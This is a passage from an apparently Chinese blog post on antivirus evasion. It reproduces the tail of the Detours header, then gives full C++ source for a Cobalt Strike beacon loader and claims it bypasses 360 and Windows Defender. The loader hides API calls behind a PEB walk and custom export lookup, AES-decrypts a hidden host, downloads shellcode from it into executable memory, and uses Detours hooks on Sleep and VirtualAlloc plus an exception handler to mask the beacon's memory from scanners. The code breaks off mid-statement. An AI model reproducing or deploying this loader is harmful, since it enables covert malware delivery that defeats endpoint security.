#endif // !UNICODEBOOL WINAPI DetourCreateProcessWithDllsA(_In_opt_ LPCSTR lpApplicationName,_Inout_opt_ LPSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCSTR lpCurrentDirectory,_In_ LPSTARTUPINFOA lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation,_In_ DWORD nDlls,_In_reads_(nDlls) LPCSTR* rlpDlls,_In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA);BOOL WINAPI DetourCreateProcessWithDllsW(_In_opt_ LPCWSTR lpApplicationName,_Inout_opt_ LPWSTR lpCommandLine,_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,_In_ BOOL bInheritHandles,_In_ DWORD dwCreationFlags,_In_opt_ LPVOID lpEnvironment,_In_opt_ LPCWSTR lpCurrentDirectory,_In_ LPSTARTUPINFOW lpStartupInfo,_Out_ LPPROCESS_INFORMATION lpProcessInformation,_In_ DWORD nDlls,_In_reads_(nDlls) LPCSTR* rlpDlls,_In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW);#ifdef UNICODE
#define DetourCreateProcessWithDlls     DetourCreateProcessWithDllsW
#else
#define DetourCreateProcessWithDlls     DetourCreateProcessWithDllsA
#endif // !UNICODEBOOL WINAPI DetourProcessViaHelperA(_In_ DWORD dwTargetPid,_In_ LPCSTR lpDllName,_In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA);BOOL WINAPI DetourProcessViaHelperW(_In_ DWORD dwTargetPid,_In_ LPCSTR lpDllName,_In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW);#ifdef UNICODE
#define DetourProcessViaHelper          DetourProcessViaHelperW
#else
#define DetourProcessViaHelper          DetourProcessViaHelperA
#endif // !UNICODEBOOL WINAPI DetourProcessViaHelperDllsA(_In_ DWORD dwTargetPid,_In_ DWORD nDlls,_In_reads_(nDlls) LPCSTR* rlpDlls,_In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA);BOOL WINAPI DetourProcessViaHelperDllsW(_In_ DWORD dwTargetPid,_In_ DWORD nDlls,_In_reads_(nDlls) LPCSTR* rlpDlls,_In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW);#ifdef UNICODE
#define DetourProcessViaHelperDlls      DetourProcessViaHelperDllsW
#else
#define DetourProcessViaHelperDlls      DetourProcessViaHelperDllsA
#endif // !UNICODEBOOL WINAPI DetourUpdateProcessWithDll(_In_ HANDLE hProcess,_In_reads_(nDlls) LPCSTR* rlpDlls,_In_ DWORD nDlls);BOOL WINAPI DetourUpdateProcessWithDllEx(_In_ HANDLE hProcess,_In_ HMODULE hImage,_In_ BOOL bIs32Bit,_In_reads_(nDlls) LPCSTR* rlpDlls,_In_ DWORD nDlls);BOOL WINAPI DetourCopyPayloadToProcess(_In_ HANDLE hProcess,_In_ REFGUID rguid,_In_reads_bytes_(cbData) LPCVOID pvData,_In_ DWORD cbData);_Success_(return != NULL)PVOID WINAPI DetourCopyPayloadToProcessEx(_In_ HANDLE hProcess,_In_ REFGUID rguid,_In_reads_bytes_(cbData) LPCVOID pvData,_In_ DWORD cbData);BOOL WINAPI DetourRestoreAfterWith(VOID);BOOL WINAPI DetourRestoreAfterWithEx(_In_reads_bytes_(cbData) PVOID pvData,_In_ DWORD cbData);BOOL WINAPI DetourIsHelperProcess(VOID);VOID CALLBACK DetourFinishHelperProcess(_In_ HWND,_In_ HINSTANCE,_In_ LPSTR,_In_ INT);////
#ifdef __cplusplus
}
#endif // __cplusplus/// Type-safe overloads for C++
//
#if __cplusplus >= 201103L || _MSVC_LANG >= 201103L
#include <type_traits>template<typename T>
struct DetoursIsFunctionPointer : std::false_type {};template<typename T>
struct DetoursIsFunctionPointer<T*> : std::is_function<typename std::remove_pointer<T>::type> {};template<typename T,typename std::enable_if<DetoursIsFunctionPointer<T>::value, int>::type = 0>LONG DetourAttach(_Inout_ T* ppPointer,_In_ T pDetour) noexcept
{return DetourAttach(reinterpret_cast<void**>(ppPointer),reinterpret_cast<void*>(pDetour));
}template<typename T,typename std::enable_if<DetoursIsFunctionPointer<T>::value, int>::type = 0>LONG DetourAttachEx(_Inout_ T* ppPointer,_In_ T pDetour,_Out_opt_ PDETOUR_TRAMPOLINE* ppRealTrampoline,_Out_opt_ T* ppRealTarget,_Out_opt_ T* ppRealDetour) noexcept
{return DetourAttachEx(reinterpret_cast<void**>(ppPointer),reinterpret_cast<void*>(pDetour),ppRealTrampoline,reinterpret_cast<void**>(ppRealTarget),reinterpret_cast<void**>(ppRealDetour));
}template<typename T,typename std::enable_if<DetoursIsFunctionPointer<T>::value, int>::type = 0>LONG DetourDetach(_Inout_ T* ppPointer,_In_ T pDetour) noexcept
{return DetourDetach(reinterpret_cast<void**>(ppPointer),reinterpret_cast<void*>(pDetour));
}#endif // __cplusplus >= 201103L || _MSVC_LANG >= 201103L
//
// Detours Internal Definitions.
//
#ifdef __cplusplus
#ifdef DETOURS_INTERNAL#define NOTHROW
// #define NOTHROW (nothrow)//
//
#if (_MSC_VER < 1299) && !defined(__GNUC__)
#include <imagehlp.h>
typedef IMAGEHLP_MODULE IMAGEHLP_MODULE64;
typedef PIMAGEHLP_MODULE PIMAGEHLP_MODULE64;
typedef IMAGEHLP_SYMBOL SYMBOL_INFO;
typedef PIMAGEHLP_SYMBOL PSYMBOL_INFO;static inline
LONG InterlockedCompareExchange(_Inout_ LONG* ptr, _In_ LONG nval, _In_ LONG oval)
{return (LONG)::InterlockedCompareExchange((PVOID*)ptr, (PVOID)nval, (PVOID)oval);
}
#else
#pragma warning(push)
#pragma warning(disable:4091) // empty typedef
#include <dbghelp.h>
#pragma warning(pop)
#endif#ifdef IMAGEAPI // defined by DBGHELP.H
typedef LPAPI_VERSION(NTAPI* PF_ImagehlpApiVersionEx)(_In_ LPAPI_VERSION AppVersion);typedef BOOL(NTAPI* PF_SymInitialize)(_In_ HANDLE hProcess,_In_opt_ LPCSTR UserSearchPath,_In_ BOOL fInvadeProcess);
typedef DWORD(NTAPI* PF_SymSetOptions)(_In_ DWORD SymOptions);
typedef DWORD(NTAPI* PF_SymGetOptions)(VOID);
typedef DWORD64(NTAPI* PF_SymLoadModule64)(_In_ HANDLE hProcess,_In_opt_ HANDLE hFile,_In_opt_ LPSTR ImageName,_In_opt_ LPSTR ModuleName,_In_ DWORD64 BaseOfDll,_In_ DWORD SizeOfDll);
typedef BOOL(NTAPI* PF_SymGetModuleInfo64)(_In_ HANDLE hProcess,_In_ DWORD64 qwAddr,_Out_ PIMAGEHLP_MODULE64 ModuleInfo);
typedef BOOL(NTAPI* PF_SymFromName)(_In_ HANDLE hProcess,_In_ LPSTR Name,_Out_ PSYMBOL_INFO Symbol);typedef struct _DETOUR_SYM_INFO
{HANDLE                  hProcess;HMODULE                 hDbgHelp;PF_ImagehlpApiVersionEx pfImagehlpApiVersionEx;PF_SymInitialize        pfSymInitialize;PF_SymSetOptions        pfSymSetOptions;PF_SymGetOptions        pfSymGetOptions;PF_SymLoadModule64      pfSymLoadModule64;PF_SymGetModuleInfo64   pfSymGetModuleInfo64;PF_SymFromName          pfSymFromName;
} DETOUR_SYM_INFO, * PDETOUR_SYM_INFO;PDETOUR_SYM_INFO DetourLoadImageHlp(VOID);#endif // IMAGEAPI#if defined(_INC_STDIO) && !defined(_CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS)
#error detours.h must be included before stdio.h (or at least define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS earlier)
#endif
#define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1#ifdef _DEBUGint Detour_AssertExprWithFunctionName(int reportType, const char* filename, int linenumber, const char* FunctionName, const char* msg);#define DETOUR_ASSERT_EXPR_WITH_FUNCTION(expr, msg) \(void) ((expr) || \(1 != Detour_AssertExprWithFunctionName(_CRT_ASSERT, __FILE__, __LINE__,__FUNCTION__, msg)) || \(_CrtDbgBreak(), 0))#define DETOUR_ASSERT(expr) DETOUR_ASSERT_EXPR_WITH_FUNCTION((expr), #expr)#else// _DEBUG
#define DETOUR_ASSERT(expr)
#endif// _DEBUG#ifndef DETOUR_TRACE
#if DETOUR_DEBUG
#define DETOUR_TRACE(x) printf x
#define DETOUR_BREAK()  __debugbreak()
#include <stdio.h>
#include <limits.h>
#else
#define DETOUR_TRACE(x)
#define DETOUR_BREAK()
#endif
#endif#if 1 || defined(DETOURS_IA64)//
// IA64 instructions are 41 bits, 3 per bundle, plus 5 bit bundle template => 128 bits per bundle.
//#define DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE (3)#define DETOUR_IA64_TEMPLATE_OFFSET (0)
#define DETOUR_IA64_TEMPLATE_SIZE   (5)#define DETOUR_IA64_INSTRUCTION_SIZE (41)
#define DETOUR_IA64_INSTRUCTION0_OFFSET (DETOUR_IA64_TEMPLATE_SIZE)
#define DETOUR_IA64_INSTRUCTION1_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE)
#define DETOUR_IA64_INSTRUCTION2_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE + DETOUR_IA64_INSTRUCTION_SIZE)C_ASSERT(DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE * DETOUR_IA64_INSTRUCTION_SIZE == 128);__declspec(align(16)) struct DETOUR_IA64_BUNDLE
{
public:union{BYTE    data[16];UINT64  wide[2];};enum {A_UNIT = 1u,I_UNIT = 2u,M_UNIT = 3u,B_UNIT = 4u,F_UNIT = 5u,L_UNIT = 6u,X_UNIT = 7u,};struct DETOUR_IA64_METADATA{ULONG       nTemplate : 8;    // Instruction template.ULONG       nUnit0 : 4;    // Unit for slot 0ULONG       nUnit1 : 4;    // Unit for slot 1ULONG       nUnit2 : 4;    // Unit for slot 2};protected:static const DETOUR_IA64_METADATA s_rceCopyTable[33];UINT RelocateBundle(_Inout_ DETOUR_IA64_BUNDLE* pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const;bool RelocateInstruction(_Inout_ DETOUR_IA64_BUNDLE* pDst,_In_ BYTE slot,_Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const;// 120 112 104 96 88 80 72 64 56 48 40 32 24 16  8  0//  f.  e.  d. c. b. a. 9. 8. 7. 6. 5. 4. 3. 2. 1. 0.//                                      00// f.e. d.c. b.a. 9.8. 7.6. 5.4. 3.2. 1.0.// 0000 0000 0000 0000 0000 0000 0000 001f : Template [4..0]// 0000 0000 0000 0000 0000 03ff ffff ffe0 : Zero [ 41..  5]// 0000 0000 0000 0000 0000 3c00 0000 0000 : Zero [ 45.. 42]// 0000 0000 0007 ffff ffff c000 0000 0000 : One  [ 82.. 46]// 0000 0000 0078 0000 0000 0000 0000 0000 : One  [ 86.. 83]// 0fff ffff ff80 0000 0000 0000 0000 0000 : Two  [123.. 87]// f000 0000 0000 0000 0000 0000 0000 0000 : Two  [127..124]BYTE    GetTemplate() const;// Get 4 bit opcodes.BYTE    GetInst0() const;BYTE    GetInst1() const;BYTE    GetInst2() const;BYTE    GetUnit(BYTE slot) const;BYTE    GetUnit0() const;BYTE    GetUnit1() const;BYTE    GetUnit2() const;// Get 37 bit data.UINT64  GetData0() const;UINT64  GetData1() const;UINT64  GetData2() const;// Get/set the full 41 bit instructions.UINT64  GetInstruction(BYTE slot) const;UINT64  GetInstruction0() const;UINT64  GetInstruction1() const;UINT64  GetInstruction2() const;void    SetInstruction(BYTE slot, UINT64 instruction);void    SetInstruction0(UINT64 instruction);void    SetInstruction1(UINT64 instruction);void    SetInstruction2(UINT64 instruction);// Get/set bitfields.static UINT64 GetBits(UINT64 Value, UINT64 Offset, UINT64 Count);static UINT64 SetBits(UINT64 Value, UINT64 Offset, UINT64 Count, UINT64 Field);// Get specific read-only fields.static UINT64 GetOpcode(UINT64 instruction); // 4bit opcodestatic UINT64 GetX(UINT64 instruction); // 1bit opcode extensionstatic UINT64 GetX3(UINT64 instruction); // 3bit opcode extensionstatic UINT64 GetX6(UINT64 instruction); // 6bit opcode extension// Get/set specific fields.static UINT64 GetImm7a(UINT64 instruction);static UINT64 SetImm7a(UINT64 instruction, UINT64 imm7a);static UINT64 GetImm13c(UINT64 instruction);static UINT64 SetImm13c(UINT64 instruction, UINT64 imm13c);static UINT64 GetSignBit(UINT64 instruction);static UINT64 SetSignBit(UINT64 instruction, UINT64 signBit);static UINT64 GetImm20a(UINT64 instruction);static UINT64 SetImm20a(UINT64 instruction, UINT64 imm20a);static UINT64 GetImm20b(UINT64 instruction);static UINT64 SetImm20b(UINT64 instruction, UINT64 imm20b);static UINT64 SignExtend(UINT64 Value, UINT64 Offset);BOOL    IsMovlGp() const;VOID    SetInst(BYTE Slot, BYTE nInst);VOID    SetInst0(BYTE nInst);VOID    SetInst1(BYTE nInst);VOID    SetInst2(BYTE nInst);VOID    SetData(BYTE Slot, UINT64 nData);VOID    SetData0(UINT64 nData);VOID    SetData1(UINT64 nData);VOID    SetData2(UINT64 nData);BOOL    SetNop(BYTE Slot);BOOL    SetNop0();BOOL    SetNop1();BOOL    SetNop2();public:BOOL    IsBrl() const;VOID    SetBrl();VOID    SetBrl(UINT64 target);UINT64  GetBrlTarget() const;VOID    SetBrlTarget(UINT64 target);VOID    SetBrlImm(UINT64 imm);UINT64  GetBrlImm() const;UINT64  GetMovlGp() const;VOID    SetMovlGp(UINT64 gp);VOID    SetStop();UINT    Copy(_Out_ DETOUR_IA64_BUNDLE* pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra = NULL) const;
};
#endif // DETOURS_IA64#ifdef DETOURS_ARM#define DETOURS_PFUNC_TO_PBYTE(p)  ((PBYTE)(((ULONG_PTR)(p)) & ~(ULONG_PTR)1))
#define DETOURS_PBYTE_TO_PFUNC(p)  ((PBYTE)(((ULONG_PTR)(p)) | (ULONG_PTR)1))#endif // DETOURS_ARM//#ifdef __cplusplus
extern "C" {
#endif // __cplusplus#define DETOUR_OFFLINE_LIBRARY(x)                                       \
PVOID WINAPI DetourCopyInstruction##x(_In_opt_ PVOID pDst,              \_Inout_opt_ PVOID *ppDstPool,     \_In_ PVOID pSrc,                  \_Out_opt_ PVOID *ppTarget,        \_Out_opt_ LONG *plExtra);         \\
BOOL WINAPI DetourSetCodeModule##x(_In_ HMODULE hModule,                \_In_ BOOL fLimitReferencesToModule); \
DETOUR_OFFLINE_LIBRARY(X86)DETOUR_OFFLINE_LIBRARY(X64)DETOUR_OFFLINE_LIBRARY(ARM)DETOUR_OFFLINE_LIBRARY(ARM64)DETOUR_OFFLINE_LIBRARY(IA64)#undef DETOUR_OFFLINE_LIBRARY////// Helpers for manipulating page protection.//_Success_(return != FALSE)BOOL WINAPI DetourVirtualProtectSameExecuteEx(_In_  HANDLE hProcess,_In_  PVOID pAddress,_In_  SIZE_T nSize,_In_  DWORD dwNewProtect,_Out_ PDWORD pdwOldProtect);_Success_(return != FALSE)BOOL WINAPI DetourVirtualProtectSameExecute(_In_  PVOID pAddress,_In_  SIZE_T nSize,_In_  DWORD dwNewProtect,_Out_ PDWORD pdwOldProtect);// Detours must depend only on kernel32.lib, so we cannot use IsEqualGUIDBOOL WINAPI DetourAreSameGuid(_In_ REFGUID left, _In_ REFGUID right);
#ifdef __cplusplus
}
#endif // __cplusplus//#define MM_ALLOCATION_GRANULARITY 0x10000//#endif // DETOURS_INTERNAL
#endif // __cplusplus#endif // _DETOURS_H_
//
  End of File.

在这里插入图片描述
看看免杀效果
再次模型上修改
在这里插入图片描述
可以看到此版本是内存做了加解密的
去黑框之后免杀效果测试
360安全中心,360杀毒,windows defender都可以过掉,如下图
在这里插入图片描述
在这里插入图片描述
总体修改思路就是在上面的基础上修改了特征,按照ConsoleApplication811进行修改的,几乎是在ConsoleApplication811的基础上进行了内存加密,hook使用的是detours进行,也就是这部分内容
全代码如下:
ConsoleApplication815.cpp


#include <iostream>
#include<Windows.h>
#include "detours.h"
#include "detver.h"
#include <WinInet.h>
#include "base64.h"
#include "AES.h"
#include "need.h"#pragma comment(lib,"detours.lib")
#pragma comment(lib,"wininet")#pragma warning(disable:4996)
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")extern "C" PVOID64 _cdecl GetPeb();
using namespace std;LPVOID Beacon_address;
SIZE_T Beacon_data_len;
DWORD Beacon_Memory_address_flOldProtect;
HANDLE hEvent;BOOL Vir_FLAG = TRUE;
LPVOID shellcode_addr;typedef LPVOID(WINAPI* VirtualAllocT)(_In_opt_ LPVOID lpAddress,_In_     SIZE_T dwSize,_In_     DWORD flAllocationType,_In_     DWORD flProtect);typedef HINTERNET(WINAPI* InternetOpenW_T)(_In_opt_ LPCWSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCWSTR lpszProxy,_In_opt_ LPCWSTR lpszProxyBypass,_In_ DWORD dwFlags);typedef HINTERNET(WINAPI* InternetConnectW_T)(_In_ HINTERNET hInternet,_In_ LPCWSTR lpszServerName,_In_ INTERNET_PORT nServerPort,_In_opt_ LPCWSTR lpszUserName,_In_opt_ LPCWSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpOpenRequestW_T)(_In_ HINTERNET hConnect,_In_opt_ LPCWSTR lpszVerb,_In_opt_ LPCWSTR lpszObjectName,_In_opt_ LPCWSTR lpszVersion,_In_opt_ LPCWSTR lpszReferrer,_In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpSendRequestW_T)(_In_ HINTERNET hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);typedef HINTERNET(WINAPI* InternetReadFile_T)(_In_ HINTERNET hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {// Get the address of the module's PE headerBYTE* pImageBase = (BYTE*)hModule;IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);// Get the address of the export directoryIMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);if (strcmp(lpProcName, pName) == 0) {WORD ordinal = pAddressOfNameOrdinals[i];DWORD functionRVA = pAddressOfFunctions[ordinal];FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);return pFunction;}}return NULL;
}HMODULE getKernel32Address()
{PVOID64 Peb = GetPeb();PVOID64 LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb + 0x018);  //0x018是LDR相对于PEB偏移   存放着LDR的基地址UNICODE_STRING* FullName;HMODULE hKernel32 = NULL;LIST_ENTRY* pNode = NULL;pNode = (LIST_ENTRY*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr + 0x30));  //偏移到InInitializationOrderModuleListwhile (true){FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);//BaseDllName基于InInitialzationOrderModuList的偏移if (*(FullName->Buffer + 12) == '\0'){hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));//DllBasebreak;}pNode = pNode->Flink;}return hKernel32;
}HMODULE getWininetAddress()
{HMODULE hWininet = nullptr;// 获取模块句柄hWininet = GetModuleHandle(L"wininet.dll");return hWininet;
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}//Hook VirtualAlloc函数的原因是我们需要知道Beacon在自展开时分配的可执行内存起始地址和大小是多少好在后面对这块内存取消X属性以免被扫描
static LPVOID(WINAPI* OldVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) = VirtualAlloc;
LPVOID WINAPI NewVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {Beacon_data_len = dwSize;Beacon_address = OldVirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect);printf("分配大小:%d", Beacon_data_len);printf("分配地址:%llx \n", Beacon_address);return Beacon_address;
}//Hool Sleep函数是因为我们需要在Beacon进入Sleep后立马取消Beacon内存区域的X属性
static VOID(WINAPI* OldSleep)(DWORD dwMilliseconds) = Sleep;
void WINAPI NewSleep(DWORD dwMilliseconds)
{if (Vir_FLAG){VirtualFree(shellcode_addr, 0, MEM_RELEASE);Vir_FLAG = false;}printf("sleep时间:%d\n", dwMilliseconds);SetEvent(hEvent);OldSleep(dwMilliseconds);
}void Hook()
{DetourRestoreAfterWith(); //避免重复HOOK,恢复原来HOOKDetourTransactionBegin(); // 开始HOOKDetourUpdateThread(GetCurrentThread());  //刷新当前线程DetourAttach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);  //将拦截的函数附加到原函数的地址上,这里可以拦截多个函数  NewVirtualAllocDetourAttach((PVOID*)&OldSleep, NewSleep);    //将拦截的函数附加到原函数的地址上, 这里可以拦截多个函数  NewSleepDetourTransactionCommit(); //  提交HOOK
}void UnHook()
{DetourTransactionBegin();   //恢复原来HOOKDetourUpdateThread(GetCurrentThread());   //刷新当前线程DetourDetach((PVOID*)&OldVirtualAlloc, NewVirtualAlloc);  //解除hookDetourTransactionCommit();  //提交
}size_t GetSize(char* szFilePath)
{size_t size;FILE* f = fopen(szFilePath, "rb");fseek(f, 0, SEEK_END);  //fseek函数用于重定位流(数据流/文件)上的文件内部位置指针   //SEEK_END代表文件末尾size = ftell(f); //获取文件的 当前指针位置 相对于 文件首地址 的偏移字节数rewind(f);  //rewind() 函数将文件位置指示符设置为给定文件流的开头fclose(f);return size;
}unsigned char* ReadBinaryFile(char* szFilePath, size_t* size)
{unsigned char* p = NULL;FILE* f = NULL;size_t res = 0;*size = GetSize(szFilePath);  //if (*size == 0) return NULL;f = fopen(szFilePath, "rb");if (f == NULL){printf("Binary file does not exists!\n");return 0;}p = new unsigned char[*size];// Read filerewind(f);res = fread(p, sizeof(unsigned char), *size, f);fclose(f);if (res == 0){delete[] p;return NULL;}return p;
}BOOL is_Exception(DWORD64 Exception_addr)
{if (Exception_addr < ((DWORD64)Beacon_address + Beacon_data_len) && Exception_addr >(DWORD64)Beacon_address){printf("地址符合:%llx\n", Exception_addr);return true;}printf("地址不符合:%llx\n", Exception_addr);return false;
}//设置VEH异常处理函数,用来在因内存X属性取消后触发异常时恢复X属性
LONG NTAPI FirstVectExcepHandler(PEXCEPTION_POINTERS pExcepInfo)
{printf("FirstVectExcepHandler\n");printf("异常错误码:%x\n", pExcepInfo->ExceptionRecord->ExceptionCode);printf("线程地址:%llx\n", pExcepInfo->ContextRecord->Rip);if (pExcepInfo->ExceptionRecord->ExceptionCode == 0xc0000005 && is_Exception(pExcepInfo->ContextRecord->Rip))    //判断异常错误码是否等于0xc0000005,并且调用is_Exception函数来判断pExcepInfo->ContextRecord->Rip是否符合某个条件。pExcepInfo 是一个指向异常信息结构体 EXCEPINFO 的指针,用于存储关于异常的详细信息,ContextRecord 是 EXCEPTION_RECORD 结构体的一个成员,它是一个指向上下文记录的指针,其中包含有关引发异常的线程的上下文信息{printf("恢复Beacon内存属性\n");VirtualProtect(Beacon_address, Beacon_data_len, PAGE_EXECUTE_READWRITE, &Beacon_Memory_address_flOldProtect);  //恢复beacon内存属性return EXCEPTION_CONTINUE_EXECUTION;}return EXCEPTION_CONTINUE_SEARCH;
}//然后创建一个线程用来在Beacon进入睡眠之后立刻取消Beacon内存区域的X属性
DWORD WINAPI Beacon_set_Memory_attributes(LPVOID lpParameter)
{printf("Beacon_set_Memory_attributes启动\n");while (true)  {WaitForSingleObject(hEvent, INFINITE);   //INFINITE表示等待时间无限长,直到收到信号为止printf("设置Beacon内存属性不可执行\n");VirtualProtect(Beacon_address, Beacon_data_len, PAGE_READWRITE, &Beacon_Memory_address_flOldProtect);   //内存属性ResetEvent(hEvent);     //重置事件对象}return 0;
}int main()
{//创建事件用来同步线程hEvent = CreateEvent(NULL, TRUE, false, NULL);   AddVectoredExceptionHandler(1, &FirstVectExcepHandler);   //表示注册一个优先级为 1 的向量化异常处理程序,并将其指向名为 FirstVectExcepHandler 的函数。当发生相应的异常时,被注册的处理程序 FirstVectExcepHandler 将会被调用。Hook();HANDLE hThread1 = CreateThread(NULL, 0, Beacon_set_Memory_attributes, NULL, 0, NULL);   //创建线程CloseHandle(hThread1);   //关闭句柄unsigned char* BinData = NULL;size_t payload_len = 500000;string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);int hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;string enpath = "EkYwlGs7z8OzXAEs7rszZA==";   //对应的文件string depath = DecryptionAES(enpath);int pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;//shellcode_addr = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  	//使用默认设置创建会话char xyVAc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };VirtualAllocT pVAc = (VirtualAllocT)CustomGetProcAddress((HMODULE)getKernel32Address(), xyVAc);shellcode_addr = pVAc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机//conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);char xyItC[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','W',0 };InternetConnectW_T pItC = (InternetConnectW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyItC);conn = pItC(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求//reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);char xyHOR[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','W',0 };HttpOpenRequestW_T pHOR = (HttpOpenRequestW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyHOR);reqfile = pHOR(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应//HttpSendRequest(reqfile, NULL, 0, 0, 0);char xyHSR[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };HttpSendRequestW_T pHSR = (HttpSendRequestW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyHSR);pHSR(reqfile, NULL, 0, 0, 0);//InternetReadFile(reqfile, shellcode_addr, payload_len, &nread);char xyIRF[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };InternetReadFile_T pIRF = (InternetReadFile_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyIRF);pIRF(reqfile, shellcode_addr, payload_len, &nread);std::string AESEncodedContent(reinterpret_cast<const char*>(shellcode_addr), nread);std::string base64DecodedContent;string AESDecodedContent = DecryptionAES(AESEncodedContent);base64DecodedContent = 